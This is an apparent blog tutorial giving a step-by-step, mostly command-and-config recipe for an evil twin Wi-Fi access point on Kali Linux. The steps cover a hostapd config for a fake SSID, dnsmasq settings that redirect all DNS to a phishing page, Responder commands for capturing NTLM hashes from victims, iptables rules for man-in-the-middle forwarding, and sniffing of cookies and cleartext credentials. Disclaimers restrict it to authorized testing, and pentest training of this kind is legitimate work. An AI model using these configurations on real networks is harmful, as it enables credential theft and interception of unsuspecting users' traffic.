How to Create a Rogue Access Point (EvilAP) with Kali Linux for Packet Sniffing and Credential Capture
π Overview
This guide walks you through the complete setup of an Evil Twin Access Point (EvilAP) using Kali Linux, hostapd, Alfa AWUS036ACH / AWUS036NHA wireless adapter, and tools like Wireshark, Responder, and iptables. This technique is commonly used by penetration testers and ethical hackers during Wi-Fi assessments to:
Capture NTLM hashes using Responder
Redirect DNS requests
Sniff cleartext credentials
Mimic a trusted Wi-Fi network (evil twin)
β οΈ This guide is for educational and authorized testing purposes only. Unauthorized use is illegal.
π οΈ Tools Youβll Need
Kali Linux (native or VirtualBox/VMware)
Alfa USB Wi-Fi Adapter (that supports AP mode)
E.g. AWUS036ACH or AWUS036NHA
hostapd β create fake access point
dnsmasq β DNS/DHCP spoofing
Responder β capture NTLM hashes
iptables β route traffic or redirect
Wireshark or tcpdump β sniff packets
π Step 1: Connect Alfa Adapter to Kali
In VirtualBox:
Go to Devices > USB > Realtek Wireless Adapter
Confirm it's passed to the VM with:
$ lsusbConfirm interface appears:
$ iw dev
π Step 2: Enable AP Mode on Adapter
Some adapters donβt support AP mode out-of-the-box. Use:
$ iw list | grep -A 10 'Supported interface modes'
Look for * AP.
If itβs missing, install the AP-compatible driver:
sudo apt install realtek-rtl88xxau-dkms
β¨ Step 3: Create Virtual Interface for AP
If iw dev wlan0 set type __ap fails, try:
$ sudo iw dev wlan0 interface add ap0 type __ap
$ sudo ip link set ap0 up
π Step 4: Create hostapd.conf
interface=ap0
driver=nl80211
ssid=EvilAP
hw_mode=g
channel=6
auth_algs=1
ignore_broadcast_ssid=0
wmm_enabled=0
Start it:
$ sudo hostapd hostapd.conf
π Step 5: Set Up DHCP + DNS with dnsmasq
Create dnsmasq.conf:
interface=ap0
dhcp-range=10.0.0.10,10.0.0.50,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
Create a fake captive portal or phishing page on 10.0.0.1.
Start dnsmasq:
$ sudo dnsmasq -C dnsmasq.conf
π₯ Step 6: Redirect DNS + Capture Hashes with Responder
Start Responder:
$ sudo responder -I ap0 -wrf
This listens for:
DNS requests
WPAD auto-discovery
SMB NTLMv1/NTLMv2 hashes
HTTP Auth
π Example: Triggering NTLM Hash with Fake Share Access
On the victim machine connected to EvilAP, open Run (Win + R) and enter:
\\10.0.0.1\share
If Responder is running, you should see something like:
[SMB] NTLMv2-SSP Client Β : 10.0.0.12
[SMB] NTLMv2-SSP Username : VICTIM\john
[SMB] NTLMv2-SSP Hash Β Β : john::VICTIM:112233445566778899aabbccddeeff11:0102030405060708090a0b0c0d0e0f10:::
This is a captured NTLMv2 hash, which can be cracked with tools like hashcat.
π Step 7: Redirect HTTP/S Traffic (Optional MITM)
Enable packet forwarding:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
Set iptables rules:
$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
$ sudo iptables -A FORWARD -i ap0 -o eth0 -j ACCEPT
Route victim traffic via Kali VM and capture it.
πΆ Example: UDP Port Test
To test UDP services (e.g., DNS, NetBIOS), run from another system:
nmap -sU -p 137,138,53 10.0.0.1
Use tools like tcpdump to monitor:
$ sudo tcpdump -i ap0 udp
π‘ Step 8: Sniff Traffic with Wireshark
Start capturing on ap0:
$ sudo wireshark &
Look for:
HTTP credentials
Cookies
Redirects
NTLM authentication
Unencrypted forms
π― Real-World Use Cases
β Wi-Fi phishing (fake login portals)
β NTLM hash capture via WPAD spoofing
β DNS redirection for malware simulation
β Testing WPA2-Enterprise bypass scenarios
β Corporate red teaming via rogue access points
π Important Legal Reminder
This setup is powerful and intended only for labs, demos, and authorized penetration testing.
Unauthorized use is a crime and could lead to criminal charges.
Written by GuyIT.co.il β Ethical Hacking & Cybersecurity Tutorials